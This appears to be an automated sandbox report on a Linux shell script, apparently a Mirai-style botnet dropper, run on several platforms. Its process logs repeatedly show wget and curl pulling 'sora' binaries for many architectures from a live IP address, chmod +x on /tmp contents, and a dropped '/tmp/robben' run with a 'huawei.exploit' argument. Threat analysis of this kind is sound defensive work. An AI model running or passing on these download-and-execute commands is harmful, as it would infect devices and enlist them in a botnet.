Analysis Overview
SHA256
bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300
Threat Level: Shows suspicious behavior
The file bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 02:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:38
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
5s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh | N/A |
Processes
/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-L7M5MD]
/tmp/robben
[./robben huawei.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 93.123.85.141:80 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:38
Platform
debian9-armhf-20240418-en
Max time kernel
12s
Max time network
13s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh | N/A |
Processes
/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
[/tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ]
/tmp/robben
[./robben huawei.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
memory/835-1-0xb6768000-0xb6779044-memory.dmp
memory/836-2-0xb6763000-0xb6774044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:38
Platform
debian9-mipsbe-20240611-en
Max time kernel
84s
Max time network
88s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
